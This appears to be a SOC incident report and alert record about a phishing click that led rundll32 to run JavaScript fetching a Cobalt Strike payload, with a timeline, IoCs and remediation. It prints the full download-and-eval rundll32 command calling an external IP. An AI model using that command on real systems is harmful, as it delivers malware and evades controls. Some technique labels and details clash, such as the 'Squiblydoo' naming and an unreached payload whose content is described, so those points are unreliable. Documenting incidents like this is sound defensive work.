CrowdStrike Alert Details
Alert ID: CS-RUNDLL32-1218-7842 Alert Time: 2024-02-20 11:30:22 EST Severity: HIGH (88/100) Source: CrowdStrike Falcon EDR Rule: “Suspicious Rundll32 Execution – No Command Line Arguments” MITRE ATT&CK: T1218.011 – System Binary Proxy Execution: Rundll32
Alert Details:
Detection: Rundll32.exe executed with suspicious parameters
Host: MKT-WS-078 (Marketing Department) User: sjones (Sarah Jones, Marketing Manager) Time: 11:25 EST
Process Tree:
explorer.exe (PID: 2341)
cmd.exe (PID: 4789)
rundll32.exe (PID: 4792)
Command Line: rundll32.exe javascript:”..\mshtml,RunHTMLApplication “;document.write();h=new%20ActiveXObject(“WinHttp.WinHttpRequest.5.1”);h.Open(“GET”,”http://185.143.221[.]89/payload”,false);h.Send();eval(h.responseText)
Detection Logic:
Rundll32.exe executing JavaScript code (unusual)
JavaScript downloads and executes payload from remote URL
No legitimate rundll32 use case for this behavior
Pattern matches known “Squiblydoo” attack technique
Additional Context:
User sjones reported receiving email with “important document” link
Clicked link at 11:20 EST
No legitimate reason for rundll32 to run JavaScript
SOC Investigation Process
Step
Action
Tools Used
Findings
1. Alert Validation
Verify CrowdStrike alert
CrowdStrike Falcon Console
Confirmed suspicious rundll32 JavaScript execution
2. URL Analysis
Analyze payload URL
URLScan.io, VirusTotal
Payload URL hosts Cobalt Strike beacon
3. Process Investigation
Terminate rundll32 process
CrowdStrike
Process killed
4. Network Block
Block malicious URL
Zscaler, Palo Alto
URL blocked
5. User Interview
Contact user
Teams, Phone
User clicked link in email; no further action
6. Host Scan
Full scan for malware
CrowdStrike
No additional malware found
Jira Incident Report
Ticket: SOC-2024-103 Summary: T1218 – Rundll32 Used as Proxy to Download Malicious Payload Status: RESOLVED Resolution: MALICIOUS – Execution Blocked Priority: P2 – MEDIUM Labels: T1218, system-binary-proxy, rundll32, squiblydoo, crowdstrike Components: Endpoint-Security, Defense-Evasion
INCIDENT ANALYSIS REPORT
1. Initial Context:
Detection Source: CrowdStrike Falcon EDR.
Alert: “Suspicious Rundll32 Execution – No Command Line Arguments”.
Host: MKT-WS-078 (Marketing Department, user sjones).
Process: rundll32.exe executing JavaScript.
Time: 2024-02-20 11:30 EST.
Technique: MITRE ATT&CK T1218.011 – System Binary Proxy Execution: Rundll32.
2. Technical Analysis:
Attack Chain:
11:20 – User receives email with link
11:21 – User clicks link
11:22 – Website redirects to exploit kit
11:23 – PowerShell command executed via browser
11:24 – PowerShell launches cmd.exe
11:25 – cmd.exe launches rundll32 with JavaScript
11:25 – JavaScript attempts to download payload from 185.143.221[.]89
11:25 – CrowdStrike detects and alerts
Rundll32 Technique:
Command: rundll32.exe javascript:”\..\mshtml,RunHTMLApplication “;…
Purpose: Use trusted Windows binary to execute malicious JavaScript
Effect: Downloads and executes payload in memory (fileless)
Evasion: Bypasses application whitelisting (rundll32 is trusted)
Payload Analysis:
URL: http://185.143.221[.]89/payload
Content: Encrypted Cobalt Strike beacon
Status: Blocked by firewall (URL not reached)
User Activity:
User clicked link expecting “marketing report”
No immediate signs of compromise
3. Investigation Findings:
Timeline:
11:20 – Phishing link clicked
11:21-11:25 – Attack chain
11:25 – CrowdStrike alert
11:27 – SOC investigates
11:28 – Rundll32 process terminated
11:29 – URL blocked
Indicators of Compromise (IoCs):
Network:
– URL: http://185.143.221[.]89/payload
– IP: 185.143.221[.]89
Process:
– rundll32.exe with JavaScript command line
4. Containment Actions:
Immediate Actions:
Terminated rundll32 process.
Blocked malicious URL at firewall and proxy.
Isolated host temporarily.
Host Remediation:
Full scan (no malware persisted).
Verified no file written to disk.
User Remediation:
Password reset.
Phishing training assigned.
5. Root Cause Analysis:
Primary Cause: User clicked phishing link.
Contributing Factors:
Rundll32 allowed to execute JavaScript (no restrictions).
No ASR rule blocking script execution via Office/trusted binaries.
6. Business Impact:
Operational Impact: Marketing workstation offline for 1 hour.
Data Exposure: None (payload blocked).
7. Remediation & Prevention:
Completed Actions:
Malicious process terminated.
URL blocked.
User educated.
Technical Controls Enhanced:
Enabled ASR rule “Block JavaScript or VBScript from launching downloaded executable content”.
Created alert for rundll32 with suspicious command lines.
Enhanced URL filtering.
8. Conclusion:
An attacker used rundll32 to proxy the download of a malicious payload via JavaScript, a fileless technique. CrowdStrike detected the anomalous rundll32 execution and terminated the process before the payload could execute.
Closure Rationale: Process terminated; URL blocked; user educated.
Analyst: [Walter White], SOC Analyst Date: 2024-02-20 12:30 EST